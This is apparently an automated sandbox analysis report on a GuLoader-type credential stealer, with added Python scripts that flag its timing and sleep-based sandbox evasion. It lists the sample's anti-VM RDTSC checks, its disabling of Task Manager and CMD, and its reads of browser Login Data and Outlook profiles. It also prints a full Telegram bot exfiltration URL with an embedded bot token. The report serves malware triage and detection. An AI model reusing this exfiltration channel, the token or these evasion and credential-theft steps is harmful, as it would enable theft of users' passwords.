            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Data Obfuscation

            Source: Yara match :: File source: 00000000.00000002.1571921135.000000000347E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe :: Code function: 0_2_00406254 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406254
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe :: Code function: 0_2_10002DA0 push eax; ret 0_2_10002DCE
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe :: File created: C:\Users\user\AppData\Local\Temp\nso68A0.tmp\System.dll
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe :: Process information set: NOOPENFILEERRORBOX (61 identical rows reported)

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\4NG0guPiKA.exe :: API/Special instruction interceptor: Address: 3E0DFEC
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe :: API/Special instruction interceptor: Address: 227DFEC
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe :: RDTSC instruction interceptor: first address: 3DD035A, second address: 3DD035A, instructions: 0x00000000 rdtsc 0x00000002 test bh, ch 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F962CDBC3ACh 0x00000008 test edi, 1CA0168Fh 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 cmp ebx, 1DF5EBBAh 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe :: RDTSC instruction interceptor: first address: 224035A, second address: 224035A, instructions: 0x00000000 rdtsc 0x00000002 test bh, ch 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F962C73EA0Ch 0x00000008 test edi, 1CA0168Fh 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 cmp ebx, 1DF5EBBAh 0x00000016 rdtsc
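The two RDTSC interceptor rows above show the shape of a timing-based VM check: two rdtsc reads only 0x16 bytes apart with nothing but filler compares and a conditional branch between them. The difference between the two counter reads is compared against a threshold elsewhere in the loader; under a hypervisor that exits on rdtsc, or under a sandbox hook such as the interceptor that produced these rows, the delta is inflated and the loader takes its evasion path (a hypervisor configured to pass rdtsc straight through keeps the delta small and the check passes). The following is an added example, not code from the Joe Sandbox report or from the sample: a small Python parser for the interceptor's instruction-trace format that measures the gap between consecutive rdtsc reads, so a triage script can flag this pattern across many reports instead of reading the traces by eye. The trace string is the one quoted in the first row; the 64-byte window used as the threshold is an assumption chosen for illustration.

```python
import re
from dataclasses import dataclass

# Constructed input: the instruction trace from the report's first
# "RDTSC instruction interceptor" row (first address 3DD035A), copied verbatim.
TRACE = (
    "0x00000000 rdtsc 0x00000002 test bh, ch 0x00000004 cmp ebx, ecx "
    "0x00000006 jc 00007F962CDBC3ACh 0x00000008 test edi, 1CA0168Fh "
    "0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 cmp ebx, 1DF5EBBAh "
    "0x00000016 rdtsc"
)


@dataclass
class Insn:
    offset: int      # byte offset relative to the first instruction of the trace
    mnemonic: str
    operands: str


# Every instruction in the trace starts with an 8-hex-digit "0x" offset, so we
# split on the whitespace that precedes such a token. Immediates in this format
# carry an "h" suffix (1CA0168Fh) and branch targets have no "0x", so neither
# can be mistaken for an offset.
_OFFSET_BOUNDARY = re.compile(r"\s+(?=0x[0-9a-fA-F]{8}\s)")


def parse_trace(text: str) -> list[Insn]:
    """Turn the interceptor's flat trace string into a list of Insn records."""
    insns = []
    for chunk in _OFFSET_BOUNDARY.split(text.strip()):
        offset, _, rest = chunk.partition(" ")
        mnemonic, _, operands = rest.partition(" ")
        insns.append(Insn(int(offset, 16), mnemonic.lower(), operands.strip()))
    return insns


def is_conditional_jump(mnemonic: str) -> bool:
    return mnemonic.startswith("j") and mnemonic != "jmp"


def rdtsc_windows(insns: list[Insn]) -> list[dict]:
    """Describe every pair of consecutive rdtsc reads in the trace."""
    positions = [i for i, x in enumerate(insns) if x.mnemonic == "rdtsc"]
    windows = []
    for a, b in zip(positions, positions[1:]):
        gap = insns[a + 1:b]
        windows.append({
            "first_offset": insns[a].offset,
            "second_offset": insns[b].offset,
            "span_bytes": insns[b].offset - insns[a].offset,
            "gap_insns": len(gap),
            "gap_mnemonics": [x.mnemonic for x in gap],
            # A conditional branch inside the window is typical of the junk
            # the loader interleaves; a naive "rdtsc; cpuid; rdtsc" signature
            # would miss this trace entirely.
            "gap_has_branch": any(is_conditional_jump(x.mnemonic) for x in gap),
        })
    return windows


# Assumed threshold (not from the report): two TSC reads within this many bytes
# of each other are treated as a timing probe.
MAX_PROBE_SPAN = 64


def looks_like_timing_probe(insns: list[Insn], max_span: int = MAX_PROBE_SPAN) -> bool:
    return any(w["span_bytes"] <= max_span for w in rdtsc_windows(insns))


if __name__ == "__main__":
    trace = parse_trace(TRACE)
    for window in rdtsc_windows(trace):
        print(window)
    print("timing probe:", looks_like_timing_probe(trace))
```

For this trace the parser yields nine instructions and one rdtsc window of 22 bytes containing seven filler instructions, one of them the jc, so the probe heuristic fires. The same parser can be pointed at the second row, which differs only in the branch target the sandbox rewrote.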
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe :: Memory allocated: D0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe :: Memory allocated: 33210000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe :: Memory allocated: 32E50000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe :: Thread delayed: delay time, one row per value in the order reported (51 rows): 922337203685477, 600000, 599875, 599766, 599656, 599547, 599437, 599328, 599219, 599094, 598984, 598875, 598766, 598655, 598546, 598436, 598326, 598219, 598097, 597969, 597859, 597735, 597609, 597500, 597390, 597281, 597172, 597062, 596953, 596844, 596719, 596609, 596500, 596390, 596281, 596172, 596062, 595953, 595843, 595734, 595625, 595516, 595391, 595281, 595172, 595062, 594953, 594843, 594734, 594625, 594516
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe :: Window / User API: threadDelayed 8793
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe :: Window / User API: threadDelayed 1060
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe :: Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nso68A0.tmp\System.dll
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe :: API coverage: 3.3 %
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556 :: Thread sleep count: 31 > 30
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556 :: Thread sleep time: -28592453314249787s >= -30000s
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7556 :: Thread sleep time: value >= -30000s, one row per value in the order reported (50 rows): -600000s, -599875s, -599766s, -599656s, -599547s, -599437s, -599328s, -599219s, -599094s, -598984s, -598875s, -598766s, -598655s, -598546s, -598436s, -598326s, -598219s, -598097s, -597969s, -597859s, -597735s, -597609s, -597500s, -597390s, -597281s, -597172s, -597062s, -596953s, -596844s, -596719s, -596609s, -596500s, -596390s, -596281s, -596172s, -596062s, -595953s, -595843s, -595734s, -595625s, -595516s, -595391s, -595281s, -595172s, -595062s, -594953s, -594843s, -594734s, -594625s, -594516s
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7552 :: Thread sleep count: 8793 > 30 (reported between the -599875s and -599766s rows of TID 7556)
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe TID: 7552 :: Thread sleep count: 1060 > 30 (reported between the -599547s and -599437s rows of TID 7556)
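The Thread delayed and Thread sleep time rows above read better as one pattern than as 51 separate facts. The first value, 922337203685477, is (2^63 - 1) / 10^4 rounded down, that is the largest signed 64-bit count of 100 ns kernel timer ticks expressed in milliseconds, which is how an effectively indefinite wait surfaces in the report; the rest start at 600000 (ten minutes) and fall by roughly 110 each row. That is the footprint of a re-armed deadline: the thread records a target time, sleeps for the remaining interval, and when the sleep returns after about 110 ms (which is what a sandbox's sleep patching produces) it recomputes the remainder and sleeps again, so skipping individual sleeps never shortens the real wait. Summing the rows (about 30 million ms) therefore overstates the intended delay; the first finite value is the deadline. Thread 7552, with 8793 and 1060 sleep calls, is the complementary many-short-sleeps loop. The following is an added Python example, not part of the report: it parses rows of this shape (a constructed subset of the values above, carrying the same Source prefix), separates the indefinite sentinel, recovers the deadline and the step size, and pulls out the high-count loop threads. The 1000 ms cap on the step size and the 1000-call floor for a loop thread are assumptions chosen for illustration, and the reading of 922337203685477 as the maximum tick count is an interpretation of the report value, not a documented constant.

```python
import re
from statistics import mean

# Constructed sample: a subset of the "Thread delayed" and "Thread sleep count"
# rows from this report, in the same shape (Source prefix, then the detail).
SAMPLE_ROWS = [
    "Source: C:\\Users\\user\\Desktop\\4NG0guPiKA.exe :: Thread delayed: delay time: 922337203685477",
    "Source: C:\\Users\\user\\Desktop\\4NG0guPiKA.exe :: Thread delayed: delay time: 600000",
    "Source: C:\\Users\\user\\Desktop\\4NG0guPiKA.exe :: Thread delayed: delay time: 599875",
    "Source: C:\\Users\\user\\Desktop\\4NG0guPiKA.exe :: Thread delayed: delay time: 599766",
    "Source: C:\\Users\\user\\Desktop\\4NG0guPiKA.exe :: Thread delayed: delay time: 599656",
    "Source: C:\\Users\\user\\Desktop\\4NG0guPiKA.exe :: Thread delayed: delay time: 599547",
    "Source: C:\\Users\\user\\Desktop\\4NG0guPiKA.exe TID: 7556 :: Thread sleep count: 31 > 30",
    "Source: C:\\Users\\user\\Desktop\\4NG0guPiKA.exe TID: 7552 :: Thread sleep count: 8793 > 30",
    "Source: C:\\Users\\user\\Desktop\\4NG0guPiKA.exe TID: 7552 :: Thread sleep count: 1060 > 30",
]

# Kernel wait timeouts are signed 64-bit counts of 100 ns ticks. The largest
# positive count, expressed in milliseconds, equals the 922337203685477 the
# report shows; treating that as "indefinite" is an interpretation, not a
# documented Joe Sandbox constant.
MAX_TICKS_MS = (2**63 - 1) // 10_000

# The regexes key only on the detail text, so the separator between the Source
# prefix and the detail does not matter.
_DELAY_RE = re.compile(r"Thread delayed: delay time:\s*(\d+)")
_COUNT_RE = re.compile(r"TID:\s*(\d+).*?Thread sleep count:\s*(\d+)\s*>")


def parse_delays(rows):
    """Delay values (ms) from every 'Thread delayed' row, in report order."""
    return [int(m.group(1)) for row in rows if (m := _DELAY_RE.search(row))]


def is_indefinite(delay_ms):
    return delay_ms >= MAX_TICKS_MS


def ms_to_nt_relative(delay_ms):
    """Relative timeout a Sleep(delay_ms) becomes at the kernel boundary:
    a negative count of 100 ns ticks (negative means relative, not absolute)."""
    return -delay_ms * 10_000


def deadline_loop(delays, max_step_ms=1000):
    """Recognise a re-armed deadline: a strictly decreasing run of finite delays
    whose successive differences are all small, i.e. the thread re-slept for
    the remainder after each early return. Returns None if the shape does not
    fit (for example three unrelated long sleeps)."""
    finite = [d for d in delays if not is_indefinite(d)]
    if len(finite) < 3:
        return None
    steps = [a - b for a, b in zip(finite, finite[1:])]
    if not all(0 < s <= max_step_ms for s in steps):
        return None
    return {
        "deadline_ms": finite[0],        # the wait the loader actually intends
        "re_arms": len(steps),           # how many times the sleep was re-issued
        "mean_step_ms": mean(steps),     # how long each sleep really lasted
        "naive_sum_ms": sum(finite),     # what adding the rows would claim
    }


def sleep_loop_threads(rows, min_calls=1000):
    """Map TID -> largest reported sleep-call count at or above min_calls."""
    counts = {}
    for row in rows:
        m = _COUNT_RE.search(row)
        if m:
            tid, n = int(m.group(1)), int(m.group(2))
            if n >= min_calls:
                counts[tid] = max(counts.get(tid, 0), n)
    return counts


if __name__ == "__main__":
    delays = parse_delays(SAMPLE_ROWS)
    print("indefinite waits:", [d for d in delays if is_indefinite(d)])
    print("deadline loop:", deadline_loop(delays))
    print("short-sleep loop threads:", sleep_loop_threads(SAMPLE_ROWS))
```

On the sample the deadline comes out as 600000 ms with four re-arms of about 113 ms each, while the naive sum is 2998844 ms; on the full 51-row list the same function gives the same deadline with 49 re-arms. Thread 7552 is the only one over the call-count floor.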
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe :: Code function: 0_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405772
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe :: Code function: 0_2_0040622D FindFirstFileW,FindClose, 0_2_0040622D
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe :: Code function: 0_2_00402770 FindFirstFileW, 0_2_00402770
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe :: Code function: 3_2_00402770 FindFirstFileW, 3_2_00402770
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe :: Code function: 3_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 3_2_00405772
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe :: Code function: 3_2_0040622D FindFirstFileW,FindClose, 3_2_0040622D
            Source: C:\Users\user\Desktop\4NG0guPiKA.exe :: Thread delayed: delay time, one row per value in the order reported (41 rows): 922337203685477, 600000, 599875, 599766, 599656, 599547, 599437, 599328, 599219, 599094, 598984, 598875, 598766, 598655, 598546, 598436, 598326, 598219, 598097, 597969, 597859, 597735, 597609, 597500, 597390, 597281, 597172, 597062, 596953, 596844, 596719, 596609, 596500, 596390, 596281, 596172, 596062, 595953, 595843, 595734, 595625
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 595516Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 595391Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 595281Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 595172Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 595062Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 594953Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 594843Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 594734Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 594625Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeThread delayed: delay time: 594516Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeFile opened: C:\Users\user\Desktop\4NG0guPiKA.exeJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeFile opened: C:\Users\user\AppData\Local\Temp\nst6786.tmpJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Jaskendes.Tin19Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Skankeben.PriJump to behavior
            Source: 4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002A99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: 4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002A38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
            Source: 4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002A99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW_
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeAPI call chain: ExitProcess graph end nodegraph_0-4703
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeAPI call chain: ExitProcess graph end nodegraph_0-4705
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 0_2_00406254 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406254
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeProcess created: C:\Users\user\Desktop\4NG0guPiKA.exe "C:\Users\user\Desktop\4NG0guPiKA.exe"Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeQueries volume information: C:\Users\user\Desktop\4NG0guPiKA.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 0_2_00405F0C GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F0C
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\4NG0guPiKA.exe | Registry value created: DisableTaskMgr 1
Source: C:\Users\user\Desktop\4NG0guPiKA.exe | Registry value created: DisableCMD 1
Source: C:\Users\user\Desktop\4NG0guPiKA.exe | Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr

            Stealing of Sensitive Information

Source: Yara match | File source: 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 4NG0guPiKA.exe PID: 8156, type: MEMORYSTR
Source: Yara match | File source: 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 4NG0guPiKA.exe PID: 8156, type: MEMORYSTR
Source: C:\Users\user\Desktop\4NG0guPiKA.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\4NG0guPiKA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\4NG0guPiKA.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match | File source: 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 4NG0guPiKA.exe PID: 8156, type: MEMORYSTR

            Remote Access Functionality

Source: Yara match | File source: 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 4NG0guPiKA.exe PID: 8156, type: MEMORYSTR
Source: Yara match | File source: 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 4NG0guPiKA.exe PID: 8156, type: MEMORYSTR
Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS
Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services
Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services
Execution: 1 Native API | Scheduled Task/Job | At | Cron | Launchd | Scheduled Task | Systemd Timers
Persistence: 1 DLL Side-Loading | Boot or Logon Initialization Scripts | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts | Startup Items
Privilege Escalation: 11 Process Injection | 1 DLL Side-Loading | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts | Startup Items
Defense Evasion: 11 Masquerading | 31 Disable or Modify Tools | 31 Virtualization/Sandbox Evasion | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | 3 Obfuscated Files or Information | 1 DLL Side-Loading
Credential Access: 1 OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync
Discovery: 21 Security Software Discovery | 31 Virtualization/Sandbox Evasion | 1 Application Window Discovery | 1 System Network Configuration Discovery | 3 File and Directory Discovery | 215 System Information Discovery | Remote System Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management
Collection: 1 Email Collection | 1 Archive Collected Data | 1 Data from Local System | 1 Clipboard Data | Keylogging | GUI Input Capture | Web Portal Capture
Command and Control: 1 Web Service | 21 Encrypted Channel | 1 Ingress Tool Transfer | 3 Non-Application Layer Protocol | 14 Application Layer Protocol | Multiband Communication | Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel
Impact: 1 System Shutdown/Reboot | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery
Source | Detection | Scanner | Label
4NG0guPiKA.exe | 76% | Virustotal |
4NG0guPiKA.exe | 63% | ReversingLabs | Win32.Trojan.GuLoader
4NG0guPiKA.exe | 100% | Avira | HEUR/AGEN.1337946

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nso68A0.tmp\System.dll | 0% | ReversingLabs |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
https://api.telegram.orgHI | 0% | Avira URL Cloud | safe
http://checkip.dyndn | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 142.250.181.238 | true | false | | high
drive.usercontent.google.com | 142.250.186.33 | true | false | | high
reallyfreegeoip.org | 104.21.80.1 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
checkip.dyndns.com | 132.226.8.169 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 | false | | high
http://checkip.dyndns.org/ | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.google.com | 4NG0guPiKA.exe, 00000003.00000003.1624599289.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.telegram.org | 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033620000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000332D7000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000333AE000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000332EB000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033418000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033687000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003347A000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000333D7000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000335AE000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | 4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://translate.google.com/translate_a/element.js | 4NG0guPiKA.exe, 00000003.00000003.1624599289.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.telegram.orgHI | 4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
